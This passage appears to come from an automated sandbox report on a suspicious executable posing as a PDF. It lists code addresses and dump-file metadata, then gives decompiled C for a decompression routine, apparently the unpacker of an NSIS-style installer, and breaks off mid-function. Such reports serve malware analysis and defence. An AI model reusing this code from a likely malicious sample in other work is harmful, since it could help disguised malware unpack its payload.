                                                                      0x00406899
                                                                      0x004068a4
                                                                      0x004068a4
                                                                      0x004068a4
                                                                      0x004068a7
                                                                      0x004068aa
                                                                      0x004068ad
                                                                      0x004068b2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406f49
                                                                      0x00406f49
                                                                      0x00406f4f
                                                                      0x00406f55
                                                                      0x00406f5b
                                                                      0x00406f75
                                                                      0x00406f78
                                                                      0x00406f7e
                                                                      0x00406f89
                                                                      0x00406f89
                                                                      0x00406f8b
                                                                      0x00406f5d
                                                                      0x00406f5d
                                                                      0x00406f6c
                                                                      0x00406f70
                                                                      0x00406f70
                                                                      0x00406f95
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406f97
                                                                      0x00406f9b
                                                                      0x0040714a
                                                                      0x00000000
                                                                      0x0040714a
                                                                      0x00406fa7
                                                                      0x00406fae
                                                                      0x00406fb6
                                                                      0x00406fb9
                                                                      0x00406fbc
                                                                      0x00406fbc
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004068da
                                                                      0x004068dc
                                                                      0x004068df
                                                                      0x00406950
                                                                      0x00406953
                                                                      0x00406956
                                                                      0x0040695d
                                                                      0x00406967
                                                                      0x00000000
                                                                      0x00406967
                                                                      0x004068e1
                                                                      0x004068e5
                                                                      0x004068e8
                                                                      0x004068ea
                                                                      0x004068ed
                                                                      0x004068f0
                                                                      0x004068f2
                                                                      0x004068f5
                                                                      0x004068f7
                                                                      0x004068fc
                                                                      0x004068ff
                                                                      0x00406902
                                                                      0x00406906
                                                                      0x0040690d
                                                                      0x00406910
                                                                      0x00406917
                                                                      0x0040691b
                                                                      0x00406923
                                                                      0x00406923
                                                                      0x00406923
                                                                      0x0040691d
                                                                      0x0040691d
                                                                      0x0040691d
                                                                      0x00406912
                                                                      0x00406912
                                                                      0x00406912
                                                                      0x00406927
                                                                      0x0040692a
                                                                      0x00406948
                                                                      0x0040694a
                                                                      0x00000000
                                                                      0x0040692c
                                                                      0x0040692c
                                                                      0x0040692f
                                                                      0x00406932
                                                                      0x00406935
                                                                      0x00406937
                                                                      0x00406937
                                                                      0x00406937
                                                                      0x0040693a
                                                                      0x0040693d
                                                                      0x0040693f
                                                                      0x00406940
                                                                      0x00406943
                                                                      0x00000000
                                                                      0x00406943
                                                                      0x00000000
                                                                      0x00406b79
                                                                      0x00406b7d
                                                                      0x00406b9b
                                                                      0x00406b9e
                                                                      0x00406ba5
                                                                      0x00406ba8
                                                                      0x00406bab
                                                                      0x00406bae
                                                                      0x00406bb1
                                                                      0x00406bb4
                                                                      0x00406bb6
                                                                      0x00406bbd
                                                                      0x00406bbe
                                                                      0x00406bc0
                                                                      0x00406bc3
                                                                      0x00406bc6
                                                                      0x00406bc9
                                                                      0x00406bc9
                                                                      0x00406bce
                                                                      0x00000000
                                                                      0x00406bce
                                                                      0x00406b7f
                                                                      0x00406b82
                                                                      0x00406b85
                                                                      0x00406b8f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406be3
                                                                      0x00406be7
                                                                      0x00406c0a
                                                                      0x00406c0d
                                                                      0x00406c10
                                                                      0x00406c1a
                                                                      0x00406be9
                                                                      0x00406be9
                                                                      0x00406bec
                                                                      0x00406bef
                                                                      0x00406bf2
                                                                      0x00406bff
                                                                      0x00406c02
                                                                      0x00406c02
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406c26
                                                                      0x00406c2a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406c30
                                                                      0x00406c34
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406c3a
                                                                      0x00406c3c
                                                                      0x00406c40
                                                                      0x00406c40
                                                                      0x00406c43
                                                                      0x00406c47
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406c97
                                                                      0x00406c9b
                                                                      0x00406ca2
                                                                      0x00406ca5
                                                                      0x00406ca8
                                                                      0x00406cb2
                                                                      0x00000000
                                                                      0x00406cb2
                                                                      0x00406c9d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406cbe
                                                                      0x00406cc2
                                                                      0x00406cc9
                                                                      0x00406ccc
                                                                      0x00406ccf
                                                                      0x00406cc4
                                                                      0x00406cc4
                                                                      0x00406cc4
                                                                      0x00406cd2
                                                                      0x00406cd5
                                                                      0x00406cd8
                                                                      0x00406cd8
                                                                      0x00406cdb
                                                                      0x00406cde
                                                                      0x00406ce1
                                                                      0x00406ce1
                                                                      0x00406ce4
                                                                      0x00406ceb
                                                                      0x00406cf0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406d7e
                                                                      0x00406d7e
                                                                      0x00406d82
                                                                      0x00407120
                                                                      0x00000000
                                                                      0x00407120
                                                                      0x00406d88
                                                                      0x00406d8b
                                                                      0x00406d8e
                                                                      0x00406d92
                                                                      0x00406d95
                                                                      0x00406d9b
                                                                      0x00406d9d
                                                                      0x00406d9d
                                                                      0x00406d9d
                                                                      0x00406da0
                                                                      0x00406da3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406973
                                                                      0x00406973
                                                                      0x00406977
                                                                      0x004070e4
                                                                      0x00000000
                                                                      0x004070e4
                                                                      0x0040697d
                                                                      0x00406980
                                                                      0x00406983
                                                                      0x00406987
                                                                      0x0040698a
                                                                      0x00406990
                                                                      0x00406992
                                                                      0x00406992
                                                                      0x00406992
                                                                      0x00406995
                                                                      0x00406998
                                                                      0x00406998
                                                                      0x0040699b
                                                                      0x0040699e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004069a4
                                                                      0x004069aa
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004069b0
                                                                      0x004069b0
                                                                      0x004069b4
                                                                      0x004069b7
                                                                      0x004069ba
                                                                      0x004069bd
                                                                      0x004069c0
                                                                      0x004069c1
                                                                      0x004069c4
                                                                      0x004069c6
                                                                      0x004069cc
                                                                      0x004069cf
                                                                      0x004069d2
                                                                      0x004069d5
                                                                      0x004069d8
                                                                      0x004069db
                                                                      0x004069de
                                                                      0x004069fa
                                                                      0x004069fd
                                                                      0x00406a00
                                                                      0x00406a03
                                                                      0x00406a0a
                                                                      0x00406a0e
                                                                      0x00406a10
                                                                      0x00406a14
                                                                      0x004069e0
                                                                      0x004069e0
                                                                      0x004069e4
                                                                      0x004069ec
                                                                      0x004069f1
                                                                      0x004069f3
                                                                      0x004069f5
                                                                      0x004069f5
                                                                      0x00406a17
                                                                      0x00406a1e
                                                                      0x00406a21
                                                                      0x00000000
                                                                      0x00406a27
                                                                      0x00000000
                                                                      0x00406a27
                                                                      0x00000000
                                                                      0x00406a2c
                                                                      0x00406a2c
                                                                      0x00406a30
                                                                      0x004070f0
                                                                      0x00000000
                                                                      0x004070f0
                                                                      0x00406a36
                                                                      0x00406a39
                                                                      0x00406a3c
                                                                      0x00406a40
                                                                      0x00406a43
                                                                      0x00406a49
                                                                      0x00406a4b
                                                                      0x00406a4b
                                                                      0x00406a4b
                                                                      0x00406a4e
                                                                      0x00406a51
                                                                      0x00406a51
                                                                      0x00406a51
                                                                      0x00406a57
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406a59
                                                                      0x00406a5c
                                                                      0x00406a5f
                                                                      0x00406a62
                                                                      0x00406a65
                                                                      0x00406a68
                                                                      0x00406a6b
                                                                      0x00406a6e
                                                                      0x00406a71
                                                                      0x00406a74
                                                                      0x00406a77
                                                                      0x00406a8f
                                                                      0x00406a92
                                                                      0x00406a95
                                                                      0x00406a98
                                                                      0x00406a9b
                                                                      0x00406a9f
                                                                      0x00406aa1
                                                                      0x00406a79
                                                                      0x00406a79
                                                                      0x00406a81
                                                                      0x00406a86
                                                                      0x00406a88
                                                                      0x00406a8a
                                                                      0x00406a8a
                                                                      0x00406aa4
                                                                      0x00406aab
                                                                      0x00406aae
                                                                      0x00000000
                                                                      0x00406ab0
                                                                      0x00000000
                                                                      0x00406ab0
                                                                      0x00406aae
                                                                      0x00406ab5
                                                                      0x00406ab5
                                                                      0x00406ab5
                                                                      0x00406ab5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406af0
                                                                      0x00406af0
                                                                      0x00406af4
                                                                      0x004070fc
                                                                      0x00000000
                                                                      0x004070fc
                                                                      0x00406afa
                                                                      0x00406afd
                                                                      0x00406b00
                                                                      0x00406b04
                                                                      0x00406b07
                                                                      0x00406b0d
                                                                      0x00406b0f
                                                                      0x00406b0f
                                                                      0x00406b0f
                                                                      0x00406b12
                                                                      0x00406b15
                                                                      0x00406b15
                                                                      0x00406b1b
                                                                      0x00406ab9
                                                                      0x00406ab9
                                                                      0x00406abc
                                                                      0x00000000
                                                                      0x00406abc
                                                                      0x00406b1d
                                                                      0x00406b1d
                                                                      0x00406b20
                                                                      0x00406b23
                                                                      0x00406b26
                                                                      0x00406b29
                                                                      0x00406b2c
                                                                      0x00406b2f
                                                                      0x00406b32
                                                                      0x00406b35
                                                                      0x00406b38
                                                                      0x00406b3b
                                                                      0x00406b53
                                                                      0x00406b56
                                                                      0x00406b59
                                                                      0x00406b5c
                                                                      0x00406b5f
                                                                      0x00406b63
                                                                      0x00406b65
                                                                      0x00406b3d
                                                                      0x00406b3d
                                                                      0x00406b45
                                                                      0x00406b4a
                                                                      0x00406b4c
                                                                      0x00406b4e
                                                                      0x00406b4e
                                                                      0x00406b68
                                                                      0x00406b6f
                                                                      0x00406b72
                                                                      0x00000000
                                                                      0x00406b74
                                                                      0x00000000
                                                                      0x00406b74
                                                                      0x00000000
                                                                      0x00406e01
                                                                      0x00406e01
                                                                      0x00406e05
                                                                      0x0040712c
                                                                      0x00000000
                                                                      0x0040712c
                                                                      0x00406e0b
                                                                      0x00406e0e
                                                                      0x00406e11
                                                                      0x00406e15
                                                                      0x00406e18
                                                                      0x00406e1e
                                                                      0x00406e20
                                                                      0x00406e20
                                                                      0x00406e20
                                                                      0x00406e23
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406bd1
                                                                      0x00406bd1
                                                                      0x00406bd4
                                                                      0x00406f46
                                                                      0x00406f46
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406fcd
                                                                      0x00406fd1
                                                                      0x00406fef
                                                                      0x00406fef
                                                                      0x00406fef
                                                                      0x00406ff6
                                                                      0x00406ffd
                                                                      0x00000000
                                                                      0x00406ffd
                                                                      0x00406fd3
                                                                      0x00406fd6
                                                                      0x00406fd9
                                                                      0x00406fdc
                                                                      0x00406fe3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004070be
                                                                      0x004070c1
                                                                      0x00406fc2
                                                                      0x00406fc2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406cf8
                                                                      0x00406cfa
                                                                      0x00406d01
                                                                      0x00406d02
                                                                      0x00406d04
                                                                      0x00406d07
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406d0f
                                                                      0x00406d12
                                                                      0x00406d15
                                                                      0x00406d17
                                                                      0x00406d19
                                                                      0x00406d19
                                                                      0x00406d1a
                                                                      0x00406d1d
                                                                      0x00406d24
                                                                      0x00406d27
                                                                      0x00406d35
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040701a
                                                                      0x0040701a
                                                                      0x0040701e
                                                                      0x00407156
                                                                      0x00000000
                                                                      0x00407156
                                                                      0x00407024
                                                                      0x00407027
                                                                      0x0040702a
                                                                      0x0040702e
                                                                      0x00407031
                                                                      0x00407037
                                                                      0x00407039
                                                                      0x00407039
                                                                      0x00407039
                                                                      0x0040703c
                                                                      0x0040703f
                                                                      0x0040703f
                                                                      0x0040703f
                                                                      0x0040703f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406d3d
                                                                      0x00406d40
                                                                      0x00406d76
                                                                      0x00406ea6
                                                                      0x00406ea6
                                                                      0x00406ea6
                                                                      0x00406ea6
                                                                      0x00406ea9
                                                                      0x00406ea9
                                                                      0x00406eac
                                                                      0x00406eae
                                                                      0x00407138
                                                                      0x00000000
                                                                      0x00407138
                                                                      0x00406eb4
                                                                      0x00406eb7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406ebd
                                                                      0x00406ec1
                                                                      0x00406ec4
                                                                      0x00406ec4
                                                                      0x00406ec4
                                                                      0x00000000
                                                                      0x00406ec4
                                                                      0x00406d42
                                                                      0x00406d44
                                                                      0x00406d46
                                                                      0x00406d48
                                                                      0x00406d4b
                                                                      0x00406d4c
                                                                      0x00406d4e
                                                                      0x00406d50
                                                                      0x00406d53
                                                                      0x00406d56
                                                                      0x00406d6c
                                                                      0x00406d71
                                                                      0x00406da9
                                                                      0x00406da9
                                                                      0x00406dad
                                                                      0x00406dd9
                                                                      0x00406ddb
                                                                      0x00406de2
                                                                      0x00406de5
                                                                      0x00406de8
                                                                      0x00406de8
                                                                      0x00406ded
                                                                      0x00406ded
                                                                      0x00406def
                                                                      0x00406df2
                                                                      0x00406df9
                                                                      0x00406dfc
                                                                      0x00406e29
                                                                      0x00406e29
                                                                      0x00406e2c
                                                                      0x00406e2f
                                                                      0x00406ea3
                                                                      0x00406ea3
                                                                      0x00406ea3
                                                                      0x00000000
                                                                      0x00406ea3
                                                                      0x00406e31
                                                                      0x00406e37
                                                                      0x00406e3a
                                                                      0x00406e3d
                                                                      0x00406e40
                                                                      0x00406e43
                                                                      0x00406e46
                                                                      0x00406e49
                                                                      0x00406e4c
                                                                      0x00406e4f
                                                                      0x00406e52
                                                                      0x00406e6b
                                                                      0x00406e6d
                                                                      0x00406e70
                                                                      0x00406e71
                                                                      0x00406e74
                                                                      0x00406e76
                                                                      0x00406e79
                                                                      0x00406e7b
                                                                      0x00406e7d
                                                                      0x00406e80
                                                                      0x00406e82
                                                                      0x00406e85
                                                                      0x00406e89
                                                                      0x00406e8b
                                                                      0x00406e8b
                                                                      0x00406e8c
                                                                      0x00406e8f
                                                                      0x00406e92
                                                                      0x00406e54
                                                                      0x00406e54
                                                                      0x00406e5c
                                                                      0x00406e61
                                                                      0x00406e63
                                                                      0x00406e66
                                                                      0x00406e66
                                                                      0x00406e95
                                                                      0x00406e9c
                                                                      0x00406e26
                                                                      0x00406e26
                                                                      0x00406e26
                                                                      0x00406e26
                                                                      0x00000000
                                                                      0x00406e9e
                                                                      0x00000000
                                                                      0x00406e9e
                                                                      0x00406e9c
                                                                      0x00406daf
                                                                      0x00406db2
                                                                      0x00406db4
                                                                      0x00406db7
                                                                      0x00406dba
                                                                      0x00406dbd
                                                                      0x00406dbf
                                                                      0x00406dc2
                                                                      0x00406dc5
                                                                      0x00406dc5
                                                                      0x00406dc8
                                                                      0x00406dc8
                                                                      0x00406dcb
                                                                      0x00406dd2
                                                                      0x00406da6
                                                                      0x00406da6
                                                                      0x00406da6
                                                                      0x00406da6
                                                                      0x00000000
                                                                      0x00406dd4
                                                                      0x00000000
                                                                      0x00406dd4
                                                                      0x00406dd2
                                                                      0x00406d58
                                                                      0x00406d5b
                                                                      0x00406d5d
                                                                      0x00406d60
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406abf
                                                                      0x00406abf
                                                                      0x00406ac3
                                                                      0x00407108
                                                                      0x00000000
                                                                      0x00407108
                                                                      0x00406ac9
                                                                      0x00406acc
                                                                      0x00406acf
                                                                      0x00406ad2
                                                                      0x00406ad5
                                                                      0x00406ad8
                                                                      0x00406adb
                                                                      0x00406add
                                                                      0x00406ae0
                                                                      0x00406ae3
                                                                      0x00406ae6
                                                                      0x00406ae8
                                                                      0x00406ae8
                                                                      0x00406ae8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406c4a
                                                                      0x00406c4a
                                                                      0x00406c4e
                                                                      0x00407114
                                                                      0x00000000
                                                                      0x00407114
                                                                      0x00406c54
                                                                      0x00406c57
                                                                      0x00406c5a
                                                                      0x00406c5d
                                                                      0x00406c5f
                                                                      0x00406c5f
                                                                      0x00406c5f
                                                                      0x00406c62
                                                                      0x00406c65
                                                                      0x00406c68
                                                                      0x00406c6b
                                                                      0x00406c6e
                                                                      0x00406c71
                                                                      0x00406c72
                                                                      0x00406c74
                                                                      0x00406c74
                                                                      0x00406c74
                                                                      0x00406c77
                                                                      0x00406c7a
                                                                      0x00406c7d
                                                                      0x00406c80
                                                                      0x00406c80
                                                                      0x00406c80
                                                                      0x00406c83
                                                                      0x00406c85
                                                                      0x00406c85
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406ec7
                                                                      0x00406ec7
                                                                      0x00406ec7
                                                                      0x00406ecb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406ed1
                                                                      0x00406ed4
                                                                      0x00406ed7
                                                                      0x00406eda
                                                                      0x00406edc
                                                                      0x00406edc
                                                                      0x00406edc
                                                                      0x00406edf
                                                                      0x00406ee2
                                                                      0x00406ee5
                                                                      0x00406ee8
                                                                      0x00406eeb
                                                                      0x00406eee
                                                                      0x00406eef
                                                                      0x00406ef1
                                                                      0x00406ef1
                                                                      0x00406ef1
                                                                      0x00406ef4
                                                                      0x00406ef7
                                                                      0x00406efa
                                                                      0x00406efd
                                                                      0x00406f00
                                                                      0x00406f04
                                                                      0x00406f06
                                                                      0x00406f09
                                                                      0x00000000
                                                                      0x00406f0b
                                                                      0x00406c88
                                                                      0x00406c88
                                                                      0x00000000
                                                                      0x00406c88
                                                                      0x00406f09
                                                                      0x0040713e
                                                                      0x00407160
                                                                      0x00407166
                                                                      0x00407168
                                                                      0x0040716f
                                                                      0x00407171
                                                                      0x00407178
                                                                      0x0040717c
                                                                      0x00000000
                                                                      0x0040676d
                                                                      0x00407175
                                                                      0x00407175
                                                                      0x00000000
                                                                      0x00407175
                                                                      0x00406fc2
                                                                      0x00407048
                                                                      0x0040704e
                                                                      0x00407051
                                                                      0x00407054
                                                                      0x00407057
                                                                      0x0040705a
                                                                      0x0040705d
                                                                      0x00407060
                                                                      0x00407063
                                                                      0x00407069
                                                                      0x00407082
                                                                      0x00407085
                                                                      0x00407088
                                                                      0x0040708b
                                                                      0x0040708f
                                                                      0x00407091
                                                                      0x00407092
                                                                      0x00407095
                                                                      0x0040706b
                                                                      0x0040706b
                                                                      0x00407073
                                                                      0x00407078
                                                                      0x0040707a
                                                                      0x0040707d
                                                                      0x0040707d
                                                                      0x0040709f
                                                                      0x00000000
                                                                      0x004070a1
                                                                      0x00000000
                                                                      0x004070a1
                                                                      0x0040709f
                                                                      0x00000000
                                                                      0x00406f14

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e7217611772f9ef51776e54c981640a2e38891cb8cac899c938ecb9dba8bbb68
                                                                      • Instruction ID: 6aec0e073e41beee5660f1704474c6018554c7323141eb4488ca3ed34e09e74f
                                                                      • Opcode Fuzzy Hash: e7217611772f9ef51776e54c981640a2e38891cb8cac899c938ecb9dba8bbb68
                                                                      • Instruction Fuzzy Hash: 71913271D04229CBDF28CFA8C854BADBBB1FF44305F14816AD856BB291C7786986CF45
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00406C26 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 98%
                                                                      			E00406C26() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M0040717D))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
